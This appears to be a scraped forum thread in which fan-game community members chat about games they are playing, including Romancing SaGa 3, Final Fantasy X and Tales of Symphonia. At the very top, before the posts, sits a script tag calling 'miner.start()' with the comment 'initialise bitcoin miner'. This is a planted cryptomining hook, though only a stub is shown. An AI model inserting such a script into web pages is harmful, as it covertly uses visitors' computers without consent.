<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmw central

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
YelseyKing
Anyone want a banana? :3
First name: Matt

Re: What games are you playing?

Postby YelseyKing » 5 years ago

KobaBeach wrote:I am getting more used to it in Romancing SaGa 3, though.

However, there are a few waza (less than 15) for each type of weapon, but there are only eight slots available in the mastered waza screen. I know there is a limit to how many waza one character can have equipped, but is there a limit to how many waza you can master in one playthrough? If anyone here has played RS3, can anyone give me an answer?

Maybe YK?
Unfortunately, it's been a good ten years or so since I played through RS3, so I can't say I remember everything... but I don't remember there being a hard limit on techs you can learn/master. It could just be that the screen scrolls once you have more than eight techs mastered, but... like I said, it's been so long that I just... don't remember. Sorry I can't be of more help.
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 5 years ago

YelseyKing wrote:Unfortunately, it's been a good ten years or so since I played through RS3, so I can't say I remember everything... but I don't remember there being a hard limit on techs you can learn/master. It could just be that the screen scrolls once you have more than eight techs mastered, but... like I said, it's been so long that I just... don't remember. Sorry I can't be of more help.
It's okay!

Also, Katrina just learned Bull Crush (or "Brook Rush" as the translation patch calls it)!
1000 damage... Gotta master it quickly, this is going to be really useful!
twitter (spicy at times!) | avatar by kuma

who cares:

pholtos
Loves adorable things.

Postby pholtos » 5 years ago

So this game I started but stopped a little while ago called Phalanx is a side scrolling danmaku game for the snes. It's... pretty difficult. Going to take a while to beat this one I think.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Ashan
The world has become a place

Postby Ashan » 5 years ago

You mean Old Man Playing Banjo Simulator?

Bean

Postby Bean » 5 years ago

I flew through a lot of Mario Kart DS yesterday. 150cc and Mission mode are done, so that just leaves winning the Mirror cups before I call this one beaten.

KobaBeach
obscure jrpg enthusiast

pholtos wrote:So this game I started but stopped a little while ago called Phalanx is a side scrolling danmaku game for the snes.
Actually, the term is "shoot 'em up", or "shmup" for short.

It's only danmaku if there is a bunch of bullets covering 90% of the screen (see: 2hu, DDP, Ikaruga).

But yeah, horizontal shmups are way harder than vertical shmups.

EDIT: SPARKING BOW TECHS AT THE SPEED OF SOUND
srsly i just sparked like three of them in the same battle like dude

EDIT 2: (A while later...) Bow techs are ridiculously easy to spark and master, yeesh
I'm using the weakest, cheapest bow I could buy (the Hunter Bow), by the way

who cares:

Ashan

Okay so
Jecht Aeon thing is basically just impossible.
I got him down to about half health on his second form before dying but it wasn't really a close battle. Also having to run around touching balls and avoiding icicles in the section before him and then watch a 7 hour long cutscene every time you want to fight him is just stupid as well. I actually decided to look up what to do on this fight and apparently a strategy is to cast Holy on him a lot? I did unlock Holy for Yuna but it takes 85MP to cast and right now I only have Yuna leveled enough so she could cast that a few times. Although that probably means I'm pretty underleveled right now. So I guess at this point in the game I'm just supposed to be grinding?

YelseyKing

Ashan wrote:Okay so
Jecht Aeon thing is basically just impossible.
I got him down to about half health on his second form before dying but it wasn't really a close battle. Also having to run around touching balls and avoiding icicles in the section before him and then watch a 7 hour long cutscene every time you want to fight him is just stupid as well. I actually decided to look up what to do on this fight and apparently a strategy is to cast Holy on him a lot? I did unlock Holy for Yuna but it takes 85MP to cast and right now I only have Yuna leveled enough so she could cast that a few times. Although that probably means I'm pretty underleveled right now. So I guess at this point in the game I'm just supposed to be grinding?
First off, I've not tried it, but... apparently Zombie works on Jecht, which stops his crazy healing.

Second, you been to Omega Ruins yet, or done any subquests like obtaining Anima? The former is ideal for grinding (you shouldn't need to overdo it if you're just aiming for the final bosses, but if you want to take on the arena bosses, Dark Aeons, or god help you, Penance... yeah, have fun spending weeks grinding. Whee.), while the latter is just damn powerful.

Third, Yuna's ultimate weapon is pretty easy to unlock (I think you just need to get all the Aeons, which itself isn't a horribly difficult task), and I *think* it has One MP Cost on it. Been a while, so I may be mistaken there, though.

And yeah, the whole sequence just before the final battle is unbelievably stupid and one of the most blatant acts of filler I've ever seen in any game, period.
Edit:
KobaBeach wrote:Also, Katrina just learned Bull Crush (or "Brook Rush" as the translation patch calls it)!
1000 damage... Gotta master it quickly, this is going to be really useful!
Ahahaha. That's one thing I *do* remember about that translation. It was... really bad. Ugly, clunky fixed-width font that resulted in squished text, mistranslations everywhere, nonsensical monster names... it's a shame it's part of the SaGa series, which the internet collectively doesn't give two shits about, because I'd like to see a retranslation of that with the same polish as the upgrades to the Live-A-Live and Rudra no Hihou fan translations. I guess the quality is excusable since it was one of the earliest fan translations, but... yeah, it hasn't aged well at all.
Last edited by YelseyKing on 09 Jun 2014, 01:01, edited 1 time in total.

Moists:

YelseyKing

...hah. You bwoke it.
Ashan wrote:I really can't believe they "remastered" this game and didn't add an ability to skip cutscenes.
It's really frustrating, cause the first time you watch a custscene it can be really good, but the fact that they made them unskippable, forcing you to watch it every time you want to fight a boss it just ruins everything good about the cutscene cause you're too annoyed about how many times you've seen it.
Yeah, and a lot of the pre-boss cutscenes, specifically the one before the fight with

Yunalesca

, are freaking *long*, too. And that's not an easy fight, either, so I wager quite a few players end up having to re-watch that marathon of scenes multiple times... I know I certainly did. Ugh.

Edit: ...yeah, fight with {TEXT}. Sure thing, board!
Last edited by YelseyKing on 09 Jun 2014, 01:54, edited 2 times in total.

Moists:

pholtos
Loves adorable things.

Ya missed a closing spoiler tag inbetween a quote me thinks... let's see... the one where he says "Third, Yuna". That mighta screwed it up.

Edit: Yep. That's what screwed it up.
Edit 2: Rena why did it happen, and can you somehow prevent it in the future?
Edit 3: and now the spoiler tags are messed up. Whelp!
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 5 years ago

i beat M M 3
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Euparkeria
Palaeontological Platformerer
Pronouns: he/him/his

Postby Euparkeria » 5 years ago

Leet wrote:i beat M M 3
Did you have a half empty feeling like me because of the rushed Wily stages?
Cool banner by Neutron Star!

KobaBeach
obscure jrpg enthusiast

Ah, it happened again.
First it was in a PM CM30 sent me, now it's in this thread.

Help us, Rena!!!
YelseyKing wrote:Ahahaha. That's one thing I *do* remember about that translation. It was... really bad. Ugly, clunky fixed-width font that resulted in squished text, mistranslations everywhere, nonsensical monster names...
Fun Fact: Katrina is a mistranslation, her actual name is "Katharina".
Yeah.

There was a Spanish translation patch released some time ago that's kinda based on this one, but I don't know if it fixes some of the translations or not.

Also, I've just been ignoring Tatyana in my party like srsly (she's been in the 6th slot for a while now)
Her weapon stats are gonna suck for a while, but at least her HP will be pretty good?

Most of my party is at like ~450 HP at this point, it's silly

My current party: Katrina, Ellen, Robin, Sharl, Muse, Tatyana

(I also gotta train magic later on)
Leet wrote:i beat M M 3
omedetou

who cares:

Alice
Pronouns: Girl person

Postby Alice » 5 years ago

Did someone lose their mobile layout somewhere along the lower half of the page?

Saturn Moriya

Postby Saturn Moriya » 5 years ago

Uh oh, the forum's going pre-21st century style o:

Ikaruga is killing me (yes it's still easy mode) ;-;
I swear, I can do every stage. Just fine. But when I enter a full playthrough. I just die. For no reason. I lose composure and die a bunch more. And then I just barely lose it in the final stage. I should've been done by now! I want to see other video games again!!

Your blood their blood serves the same!!

Bee Kirby

Postby Bee Kirby » 5 years ago

I've been playing Mario Kart 8 a lot recently.
Occasionally I say things.

Bean

Postby Bean » 5 years ago

I took down Mario Kart DS. Being able to play the game with the Circle Pad helped with cornering for me to the point where the game was somewhat enjoyable after over eight years of trying to give it a fair shake.

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 5 years ago

Finally started playing tales of the abyss. I like the gameplay, but the plot is a little too anime for me
That crazy voice dude

Medley
The younger sister
First name: It's ambiguous, really
Pronouns:

Postby Medley » 5 years ago

Still better than Xillia's plot, if you ask me. I could not get into that story at all.

How far into the game are you?
Pyon!

YelseyKing

Tales... *shudder*

Those games seem to be famous for their terrible plots. Tales of Symphonia is the *only* game I've ever played where a *plot event* actually made me ragequit the game entirely in disgust...

Warning: Rant!
So, I spend the better part of three or so game hours protecting a loud-mouthed, impulsive girl with the stupid name of "Chocolat", her mother, and the town she lives in from the evil Desians; basically half-elf Nazis. But mostly from one particularly assholish Desian leader, whose name eludes me at the moment. After saving the life of her and her mother at least twice each because of how brazenly outspoken she is against the Desians, she eventually gets kidnapped and taken to a "human ranch"; basically a concentration camp. These things are supposed to be impregnable and inescapable. But the hero, Lloyd, is kind of a ditz, and decided to risk everything to break in and save her. Against all odds, he succeeds... only for the asshole Desian leader to "casually inform" Chocolat that Lloyd killed her grandmother earlier in the game. This is technically true. However, said asshole leader neglects to mention that she was a Desian prisoner, and that the Desians had already irreversibly transformed her into an almost mindlessly violent monster, and the only thing they *could* do was mercy kill her before she went on a murderous rampage. You'd think Chocolat would death glare the Desian leader and accuse him of lying, since about all he's tried to do is kill her, her mother, her townspeople, and Lloyd himself over the last several hours. Or you'd think she'd at least have the decency to ask Lloyd if this is true, giving him his chance to explain, considering all he's done for her. But no. Instead, she completely loses her shit, declares that she hates Lloyd, and that she "doesn't want to be rescued by a murderer", leaving willingly with the same asshole who tried repeatedly to kill her.

At that point, my brain just completely melted. I already had issues with the game's story before that. Mostly, Genis causing all manner of problems, getting no blame for it (with Lloyd taking the fall for every single thing that little shit did), and everyone constantly insulting Lloyd for every little question he asked. Meanwhile, bending over backwards if Colette, who was every bit as naive and clueless as we were constantly told Lloyd was, asked the same question, because she's "the chosen one who will save the world", which made everyone come across as mean-spirited in general, but wanting to suck up to the savior. Argh.

Between all that and the fact that the game seems to *reward* blind button mashing over finesse (you gain "grade" for finishing battles as fast as possible and nothing else, meaning if you fight smart, you'll *lose* "grade", while you'll gain the most if you rapid-fire hammer A), *and* a skill growth system that was poorly explained and I didn't understand one bit... it was just the perfect storm of failure. Maybe I'll give the game another shot, but... yeah. Ugh.

Moists:

Ashan

Well this is stupid.

Can't beat boss but need ultimate weapons to do so (particularly Yuna's)-->have weapon but it's not upgraded. Need moon sigil to do so-->need all Aeons in order to do it but need Anima-->need to have solved all destruction sphere puzzles to enter temple-->need to go back to Besaid village to complete destruction sphere puzzle-->need to beat dark Valefor to enter Besaid but he's impossible.

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 5 years ago

Roy Angrym'n wrote:Still better than Xillia's plot, if you ask me. I could not get into that story at all.

How far into the game are you?
Up to the oasis
That crazy voice dude

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 5 years ago

why do people make such generically settinged rpgs over and over and over

there need to be more Space Funerals and OFFs and MOTHERs in the world
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

pholtos
Loves adorable things.

No no there needs to be a desert area, a volcano, a beach area, an icy area, a forest, a plains!

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

YelseyKing

Ashan wrote:Well this is stupid.

Can't beat boss but need ultimate weapons to do so (particularly Yuna's)-->have weapon but it's not upgraded. Need moon sigil to do so-->need all Aeons in order to do it but need Anima-->need to have solved all destruction sphere puzzles to enter temple-->need to go back to Besaid village to complete destruction sphere puzzle-->need to beat dark Valefor to enter Besaid but he's impossible.
Yup. I mentioned that earlier... the Dark Aeons were a... questionable inclusion. The game already had a good three dozen optional superbosses... did it *really* need a bunch more that made the original batch look like infants, in sometimes unavoidable locations that prevent you from returning to previous areas? Fortunately, I've only played the original PS2 American release, which didn't have those.

Moists:

Return to “the cartridgé”